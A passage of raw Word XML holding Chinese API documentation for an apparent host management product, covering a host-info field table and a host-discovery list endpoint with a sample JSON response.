        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server组"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>hostTag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server-6"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</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error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>在线"</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total"</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charts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59EBD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1362"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1037"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="37E8A48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DB925A4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52E5E78F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58F130C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="027A237D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FD646D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E029411" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F754B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C85130C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22B02391" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A512B26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76F1277E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1650A1B1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38387A04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69ADD04E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C1D2CE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EF9935A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E57BBE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76CF392B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06D11AB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="71D45ADE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6796AD1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A7C7EC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3517EC63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CE4F25B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AAEECBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23BCCC54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CF778E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7299C593" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="563263C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66299CA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="656BC60D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6087A364" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103D84FA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="232325F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16734E18" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A9F4D6B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E9427C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24C66E62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B8579D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7CF50CBA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6A03DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A23618C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;String&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A620209" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E532C46" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FF62644" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0126F1B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E13F2B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>错误码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0EE4AAA2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D65DEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45DD7D73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D227B65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>错误信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1435EE0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="401" w:name="_Toc115166273"/>
      <w:bookmarkStart w:id="402" w:name="主机发现"/>
      <w:bookmarkEnd w:id="380"/>
      <w:bookmarkEnd w:id="400"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>主机发现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="401"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA324D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="_Toc115166274"/>
      <w:bookmarkStart w:id="404" w:name="获取主机发现结果"/>
      <w:r>
        <w:t>获取主机发现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
    </w:p>
    <w:p w14:paraId="60689C0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28375DBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>discoveredhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F13EC48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C7114" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776AEDE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C355E07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>discoveredhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="06652BDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725026F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "id": "5fa5219373f7a26f9cfaa5ba",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>macAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "00:50:56:E5:B5:D0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.5.102",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deviceType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "host",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osFamily</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Linux",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "5f8fe67e3125215c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>discoveryIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.111.100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scanMethods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp_syn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "ping"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstDiscoverTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1604657555,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastDiscoverTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1604657555,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "total": 19,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F359E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>返回rows部分说明</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
